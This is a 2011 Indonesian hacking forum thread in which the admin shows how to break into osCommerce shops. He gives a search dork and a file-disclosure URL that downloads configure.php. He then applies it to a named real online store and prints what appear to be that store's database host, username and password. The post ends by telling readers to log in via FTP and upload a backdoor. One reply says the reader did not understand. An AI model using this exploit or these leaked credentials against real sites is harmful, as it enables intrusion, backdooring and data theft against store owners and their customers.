Would you like to react to this message? Create an account in a few clicks or log in to continue.

Login

Lupa password?

Latest topics

» Setting GPRS
Upload Backdoor di osCommerce EmptyTue Nov 22, 2011 2:31 pm by nandazzzz

» Tools Untuk Menganalisa Suatu Virus
Upload Backdoor di osCommerce EmptyTue Nov 22, 2011 2:29 pm by nandazzzz

» admin masu
Upload Backdoor di osCommerce EmptyTue Nov 22, 2011 2:28 pm by nandazzzz

» Cara Memperkuat Sinyal Modem USB
Upload Backdoor di osCommerce EmptyTue Nov 22, 2011 2:27 pm by nandazzzz

» Mempercepat koneksi mozilla
Upload Backdoor di osCommerce EmptyTue Nov 22, 2011 2:26 pm by nandazzzz

» Memblock situs" berbau negatif
Upload Backdoor di osCommerce EmptyTue Nov 22, 2011 2:25 pm by nandazzzz

» pengumuman buat penghuni forum
Upload Backdoor di osCommerce EmptyThu Oct 06, 2011 3:49 pm by Nyonya oXside

» Membangun Web Server pada Jaringan Lokal (LAN)
Upload Backdoor di osCommerce EmptyWed Oct 05, 2011 7:21 pm by farizmht

»  Perbedaan Virus Dengan Worm
Upload Backdoor di osCommerce EmptyWed Oct 05, 2011 7:12 pm by farizmht

November 2024

MonTueWedThuFriSatSun
    123
45678910
11121314151617
18192021222324
252627282930 

Calendar Calendar

Donate money

Donations will be used to buy all prizes in tournaments. If no one donates, then the only prize we can give is rank points. So please donate whenever possible, even if you don't donate much.
~ Thanks-Admin(lutfi oXside)

2 posters

    Upload Backdoor di osCommerce

    lutfi oXside89
    lutfi oXside89
    Admin
    Admin


    Jumlah posting : 90
    Points : 175
    Reputation : 0
    Join date : 25.08.11
    Age : 28
    Lokasi : bandarlampung

    Upload Backdoor di osCommerce Empty Upload Backdoor di osCommerce

    Post  lutfi oXside89 Tue Sep 13, 2011 8:18 am


    ============================================================

    #File Disclosure : admin/file_manager.php/login.php?action=download&filename=

    #Dork : Powered by osCommerce

    #Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

    ==============================================================</div>


    Ok, sekarang kita cari targetnya dgn dork “Powered by osCommerce”

    Sekarang kita cari target nya dengan memasukkan dork tadi ke google
    Contoh target yang saya dapatkan :


    <span style="color: red;"><div class="codeblock">
    <div class="title">
    Code:
    </div>
    <div class="body" dir="ltr">
    <code>http://rsmjstore.com/admin/login.php</code></div>
    </div>
    </span>


    utk percobaan kita pake trget itu...
    Dan kita masuk admin page nya ya...

    sekarang, kita pake exploitnya jadinya :

    <span style="color: red;"><div class="codeblock">
    <div class="title">
    Code:
    </div>
    <div class="body" dir="ltr">
    <code>http://rsmjstore.com/admin/file_manager.php/login.php?action=download&amp;filename=/includes/configure.php</code></div>
    </div>
    </span>

    nah kita mendapatkan configure.php, lsg aja deh kita download <img alt="seringai" border="0" src="http://www.palembanghackerlink.org/images/smilies/ym/4.gif" style="vertical-align: middle;" title="seringai" />

    Selanjutnya, setelah kita download kita buka menggunakan notepad, disitu akan keluar database dan password :

    <span style="color: red;"><div class="codeblock">
    <div class="title">
    Code:
    </div>
    <div class="body" dir="ltr">
    <code>('DB_SERVER', '10.6.171.62');
    define('DB_SERVER_USERNAME', 'rsmjmaster');
    define('DB_SERVER_PASSWORD', 'Cb81419');
    define('DB_DATABASE', 'rsmjmaster');
    define('USE_PCONNECT', 'false');
    define('STORE_SESSIONS', 'mysql');
    ?&gt;</code></div>
    </div>
    </span>

    Habis kita dptkan yg kyk gitu, marilah kita buka melalui FTP, di sini saya menggunakan FileZila,

    Dan kita Upload backdoor kita Surprised
    farizmht
    farizmht
    good job
    good job


    Jumlah posting : 67
    Points : 91
    Reputation : 3
    Join date : 11.09.11
    Age : 29
    Lokasi : BANDAR LAMPUNG

    Upload Backdoor di osCommerce Empty Re: Upload Backdoor di osCommerce

    Post  farizmht Wed Oct 05, 2011 7:07 pm

    gag ngerti Laughing Laughing Laughing Laughing

      Waktu sekarang Sun Nov 24, 2024 7:56 am